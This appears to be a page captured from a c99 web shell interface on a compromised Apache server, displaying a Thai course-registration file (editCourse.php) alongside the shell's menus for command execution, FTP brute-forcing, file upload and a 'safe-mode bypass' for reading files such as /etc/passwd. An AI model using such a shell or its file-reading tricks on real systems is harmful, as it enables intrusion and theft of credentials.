!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/reg-tools/   drwxr-xr-x
Free 51.23 GB of 127.8 GB (40.08%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     editCourse.php (14.75 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<div id="modalDel" class="modal fade">
    <div class="modal-dialog">
        <div class="modal-content">
            <div class="modal-header flex-column">
                <button type="button" class="btn-close" data-dismiss="modal" aria-label="Close"></button>
                <div class="icon-box">
                    <i class="bi-x-circle" style="color:red; font-size:70px;"></i>
                </div><br />
                <h4 class="modal-title text-center">Are you sure?</h4>
            </div>
            <div class="modal-body text-center">
                <p>ต้องการลบข้อมูลนี้ใช่หรือไม่</p>
                <form method="post" name="delForm" id="delForm">
                    <input type="hidden" name="crsId" id="crsId" />
                    <input type="hidden" name="action" value="deleteCrs" />
                </form>
            </div>
            <div class="modal-footer justify-content-center">
                <button type="button" class="btn btn-secondary" data-dismiss="modal">Cancel</button>
                <button type="button" id="btnConfirmDel" class="btn btn-danger">Delete</button>
            </div>
        </div>
    </div>
</div>

<div class="modal" id="editCourse" tabindex="-1" aria-labelledby="exampleModalLabel" aria-hidden="true">
    <div class="modal-dialog modal-xl">
        <div class="modal-content">
            <div class="modal-header">
                <h5 class="modal-title">แก้ไขข้อมูล</h5>
                <button type="button" class="btn-close" data-dismiss="modal" aria-label="Close"></button>
            </div>
            <div class="modal-body">
                <div class="container">
                    <form method="post" name="editCourseForm" id="editCourseForm" action="javascript:updateCrs();" class="row g-3 needs-validation" novalidate>
                        <input type="hidden" class="form-control" name="crsId" id="crsId" required />
                        <input type="hidden" name="action" value="updateCrs" />
                        <div class="col-md-6">
                            <div class="input-group">
                                <label for="inputGroup01" class="input-group-text">รหัสวิชา (ไทย)</label>
                                <input type="text" class="form-control" name="crsCode" id="crsCode" required />
                                <div class="invalid-feedback">
                                    กรุณากรอกข้อมูลให้ถูกต้อง
                                </div>
                            </div>
                        </div>
                        <div class="col-md-6">
                            <div class="input-group">
                                <label for="inputGroup02" class="input-group-text">รหัสวิชา (อังกฤษ)</label>
                                <input type="text" class="form-control" name="crsCodeE" id="crsCodeE" required />
                                <div class="invalid-feedback">
                                    กรุณากรอกข้อมูลให้ถูกต้อง
                                </div>
                            </div>
                        </div>
                        <div class="col-md-6">
                            <div class="input-group">
                                <label for="inputGroup01" class="input-group-text">ชื่อรายวิชา (ไทย)</label>
                                <input type="text" class="form-control" name="crsName" id="crsName" required />
                                <div class="invalid-feedback">
                                    กรุณากรอกข้อมูลให้ถูกต้อง
                                </div>
                            </div>
                        </div>
                        <div class="col-md-6">
                            <div class="input-group">
                                <label for="inputGroup02" class="input-group-text">ชื่อรายวิชา (อังกฤษ)</label>
                                <input type="text" class="form-control" name="crsNameE" id="crsNameE" required />
                                <div class="invalid-feedback">
                                    กรุณากรอกข้อมูลให้ถูกต้อง
                                </div>
                            </div>
                        </div>
                        <div class="col-md-6">
                            <div class="input-group">
                                <label for="inputGroup04" class="input-group-text">ชื่อย่อรายวิชา (ไทย)</label>
                                <input type="text" class="form-control" name="crsAbbr" id="curNameAbbrT" required />
                                <div class="invalid-feedback">
                                    กรุณากรอกข้อมูลให้ถูกต้อง
                                </div>
                            </div>
                        </div>
                        <div class="col-md-6">
                            <div class="input-group">
                                <label for="inputGroup05" class="input-group-text">ชื่อย่อรายวิชา (อังกฤษ)</label>
                                <input type="text" class="form-control" name="crsAbbrE" id="curNameAbbrE" required />
                                <div class="invalid-feedback">
                                    กรุณากรอกข้อมูลให้ถูกต้อง
                                </div>
                            </div>
                        </div>
                        <div class="col-md-3">
                            <div class="input-group">
                                <label for="inputGroup01" class="input-group-text">จำนวนหน่วยกิตรวม</label>
                                <input type="number" class="form-control" name="crsCreditTotal" id="crsCode" required />
                                <div class="invalid-feedback">
                                    กรุณากรอกข้อมูลให้ถูกต้อง
                                </div>
                            </div>
                        </div>
                        <div class="col-md-3">
                            <div class="input-group">
                                <label for="inputGroup02" class="input-group-text">ชั่วโมงทฤษฎี</label>
                                <input type="number" class="form-control" name="crsCredit1" id="crsCredit1" required />
                                <div class="invalid-feedback">
                                    กรุณากรอกข้อมูลให้ถูกต้อง
                                </div>
                            </div>
                        </div>
                        <div class="col-md-3">
                            <div class="input-group">
                                <label for="inputGroup01" class="input-group-text">ชั่วโมงปฏิบัติ</label>
                                <input type="number" class="form-control" name="crsCredit2" id="crsCredit2" required />
                                <div class="invalid-feedback">
                                    กรุณากรอกข้อมูลให้ถูกต้อง
                                </div>
                            </div>
                        </div>
                        <div class="col-md-3">
                            <div class="input-group">
                                <label for="inputGroup02" class="input-group-text">ชั่วโมงศึกษาด้วยตัวเอง</label>
                                <input type="number" class="form-control" name="crsPeriod3" id="crsPeriod3" required />
                                <div class="invalid-feedback">
                                    กรุณากรอกข้อมูลให้ถูกต้อง
                                </div>
                            </div>
                        </div>
                        <div class="col-md-12">
                            <div class="input-group">
                                <label for="inputGroupSelect01" class="input-group-text">หมวดวิชา</label>
                                <select class="form-select" name="crsCdId" id="crsCdId" required>
                                    <option selected disabled value="">-- เลือก --</option>
                                    <?php
                                    $sql 
"SELECT * FROM rg_Condition";
                                    
$link->query($sql);
                                    while (
$data $link->getnext()) {
                                        echo 
"<option value='" $data->cdId "'>" $data->cdName " " $data->cdNameE "</option>";
                                    }
                                    
?>
                                </select>
                                <div class="invalid-feedback">
                                    กรุณากรอกข้อมูลให้ถูกต้อง
                                </div>
                            </div>
                        </div>
                        <div class="col-md-12" style="text-align: center;">
                            <button type="submit" id="btnUpdateSubmit" class="btn btn-primary">Update</button>
                            <!--<button type="submit" class="btn btn-primary">Save</button>-->
                        </div>
                    </form>
                </div>
            </div>
            <div class="modal-footer">
                <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button>
                <!--<button type="submit" id="btnUpdateSubmit" class="btn btn-primary">Save</button>-->
            </div>
        </div>
    </div>
</div>

<div class="container">
    <p class="fs-3">แก้ไขข้อมูลรายวิชา</p>
    <table id="courseList" class="table table-striped display" style="width:100%">
        <thead>
            <tr>
                <th>No.</th>
                <th>รหัสวิชา (ไทย)</th>
                <th>รหัสวิชา (อังกฤษ)</th>
                <th>ชื่อวิชา (ไทย)</th>
                <th>ชื่อวิชา (อังกฤษ)</th>
                <th>หน่วยกิต</th>
                <th>ดำเนินการ</th>
            </tr>
        </thead>
        <tfoot>
            <tr>
                <th>No.</th>
                <th>รหัสวิชา (ไทย)</th>
                <th>รหัสวิชา (อังกฤษ)</th>
                <th>ชื่อวิชา (ไทย)</th>
                <th>ชื่อวิชา (อังกฤษ)</th>
                <th>หน่วยกิต</th>
                <th>ดำเนินการ</th>
            </tr>
        </tfoot>
    </table>
</div>

<!-- Bootstrap JS -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>

<script src="https://cdn.datatables.net/1.12.1/js/jquery.dataTables.min.js"></script>
<script src="https://cdn.datatables.net/1.12.1/js/dataTables.bootstrap5.min.js"></script>

<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.16.0/umd/popper.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>


<script>
    $(document).ready(function() {
        getDataAll();
        get();
        delCrs();

        $('#crsCdId').select2({
            dropdownParent: $('#editCourse'),
            theme: "bootstrap-5",
            width: $(this).data('width') ? $(this).data('width') : $(this).hasClass('w-100') ? '100%' : 'style',
            placeholder: $(this).data('placeholder'),
        });

        $(document).delegate("[data-target='#modalDel']", "click", function() {
            $("#delForm [name=\"crsId\"]").val($(this).attr('data-id'));
        })
    });

    function getDataAll() {
        $('#courseList').DataTable({
            processing: true,
            ajax: {
                url: "api/course.php",
                data: {
                    action: "getCrsAll"
                },
                dataSrc: 'data'
            },
            columnDefs: [{
                    targets: [6],
                    className: 'text-center'
                },
                {
                    "width": "15%",
                    "targets": 6
                }
            ],
            columns: [{
                    data: "No"
                },
                {
                    data: "crsCode"
                },
                {
                    data: "crsCodeE"
                },
                {
                    data: "crsName"
                },
                {
                    data: "crsNameE"
                },
                {
                    data: "crsUnit"
                },
                {
                    data: "opt"
                },
            ],
        });
    }

    function get() {
        $(document).delegate("[data-target='#editCourse']", "click", function() {

            var crsId = $(this).attr('data-id');

            // Ajax config
            $.ajax({
                type: "GET", //we are using GET method to get data from server side
                url: './api/course.php', // get the route value
                data: {
                    crsId: crsId,
                    action: "getCrsById"
                }, //set data
                beforeSend: function() { //We add this before send to disable the button once we submit it so that we prevent the multiple click

                },
                success: function(response) { //once the request successfully process to the server side it will return result here
                    response = JSON.parse(response);

                    $("#editCourseForm [name=\"crsId\"]").val(response.crsId);
                    $("#editCourseForm [name=\"crsCode\"]").val(response.crsCode);
                    $("#editCourseForm [name=\"crsCodeE\"]").val(response.crsCodeE);
                    $("#editCourseForm [name=\"crsName\"]").val(response.crsName);
                    $("#editCourseForm [name=\"crsNameE\"]").val(response.crsNameE);
                    $("#editCourseForm [name=\"crsAbbr\"]").val(response.crsAbbr);
                    $("#editCourseForm [name=\"crsAbbrE\"]").val(response.crsAbbrE);
                    $("#editCourseForm [name=\"crsCreditTotal\"]").val(response.crsCreditTotal);
                    $("#editCourseForm [name=\"crsCredit1\"]").val(response.crsCredit1);
                    $("#editCourseForm [name=\"crsCredit2\"]").val(response.crsCredit2);
                    $("#editCourseForm [name=\"crsPeriod3\"]").val(response.crsPeriod3);
                    //$("#editCourseForm [name=\"crsCdId\"]").val(response.crsCdId);
                    $("#crsCdId").val(response.crsCdId).trigger('change');
                }
            });
        });
    }

    function updateCrs() {
        
            var $this = $("#btnUpdateSubmit"); //submit button selector using ID
            var $caption = $this.html(); // We store the html content of the submit button
            var form = "#editCourseForm"; //defined the #form ID
            var formData = $(form).serializeArray(); //serialize the form into array
            //var route = $(form).attr('action'); //get the route using attribute action
            var route = "./api/course.php";

            // Ajax config
            $.ajax({
                type: "POST", //we are using POST method to submit the data to the server side
                url: route, // get the route value
                data: formData, // our serialized array data for server side
                beforeSend: function() { //We add this before send to disable the button once we submit it so that we prevent the multiple click
                    $this.attr('disabled', true).html("Processing...");
                },
                success: function(response) { //once the request successfully process to the server side it will return result here
                    $this.attr('disabled', false).html($caption);

                    // Reload lists of employees
                    //getDataAll();
                    //window.location.href='./?page=editCurriculum';
                    //$('#courseList').DataTable().ajax.reload();
                    $('#courseList').DataTable().destroy();
                    getDataAll();

                    // We will display the result using alert
                    alert(response);

                    // Reset form
                    //resetForm(form);

                    // Close modal
                    $(".modal-backdrop").remove();
                    $('#editCourse').modal().toggle();
                    
                },

            });
    }

    function delCrs() {
        $("#btnConfirmDel").on("click", function() {
            var $this = $(this); //submit button selector using ID
            var $caption = $this.html(); // We store the html content of the submit button
            var form = "#delForm"; //defined the #form ID
            var formData = $(form).serializeArray(); //serialize the form into array
            //var route = $(form).attr('action'); //get the route using attribute action
            var route = "./api/course.php";

            // Ajax config
            $.ajax({
                type: "POST", //we are using POST method to submit the data to the server side
                url: route, // get the route value
                data: formData, // our serialized array data for server side
                beforeSend: function() { //We add this before send to disable the button once we submit it so that we prevent the multiple click
                    $this.attr('disabled', true).html("Processing...");
                },
                success: function(response) { //once the request successfully process to the server side it will return result here
                    $this.attr('disabled', false).html($caption);

                    // Reload lists of employees
                    $('#courseList').DataTable().destroy();
                    getDataAll();

                    // We will display the result using alert
                    alert(response);

                    // Reset form
                    //resetForm(form);

                    // Close modal
                    $(".modal-backdrop").remove();
                    $('#modalDel').modal().toggle();
                },

            });
        });
    }

    (() => {
        'use strict'

        // Fetch all the forms we want to apply custom Bootstrap validation styles to
        const forms = document.querySelectorAll('.needs-validation')

        // Loop over them and prevent submission
        Array.from(forms).forEach(form => {
            form.addEventListener('submit', event => {
                if (!form.checkValidity()) {
                    event.preventDefault()
                    event.stopPropagation()
                }

                form.classList.add('was-validated')
            }, false)
        })
    })()
</script>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0161 ]--